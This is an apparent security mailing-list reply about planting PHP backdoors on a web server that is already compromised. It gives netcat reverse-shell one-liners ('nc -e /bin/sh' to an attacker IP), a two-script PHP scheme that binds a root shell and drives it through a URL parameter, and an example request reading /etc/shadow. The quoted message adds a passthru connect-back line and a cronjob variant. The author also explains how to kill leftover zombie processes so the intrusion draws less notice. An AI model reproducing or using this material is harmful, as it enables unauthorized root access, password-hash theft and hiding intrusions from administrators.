Re: perl/php connect-back backdoor?

[Diode Trnasistor <ffddfe () yahoo com>]

Hi,

I've been using this technique for a while.  If you
can upload a php or a perl file which gets executed in
the server context you already won, regardless of
firewall rules.  The obvious method is the connect
back(i.e nc -e /bin/sh x.x.x.x 80 as that's the
likelly allowed outbound port).  If that's a no go,
and there's absolutelly no way to estabilish a
session, you still win.  

Consider this:
<?
   `exploit which gets root and calls nc -e /bin/sh -l
-p 9999`
?>

then another script:
<?  
   $z = `echo $x | nc localhost 999`;
   $z=str_replace("\n", "<br>", $z);
   echo $z;
?>

As is obvious, call the second script and you have
somehwat of a crippled root shell.

www.target.com/script2.php?x=cat /etc/shadow

you get the point :P

PS: the silly thing about this is that each command
you execute this way ends up as a zombie process.
In a few minutes of working with this "shell" you'll
have hundreds of zombie processes on the target
machine.  What i like to do is run zkill (zkill.c
google it) slightly modified to terminate all zombies.
 This way it's less obvious that something very odd is
going on.

--- Knud_Erik_Højgaard <kain () ircop dk> wrote:
> Ingram wrote:
> [snip]
> > i got right know is uid www. I think a
> connect-back perl/php code
> > could made it through this packtfilter, as the
> outbound rules could
> > be less tight. 
> >
> > Anyone aware of a backdoor like this?
> netcat:
> <? passthru("nc -e /bin/sh ip port"); ?>
>
> or a cronjob doing the same.. 
>
> --
> kokanin


__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com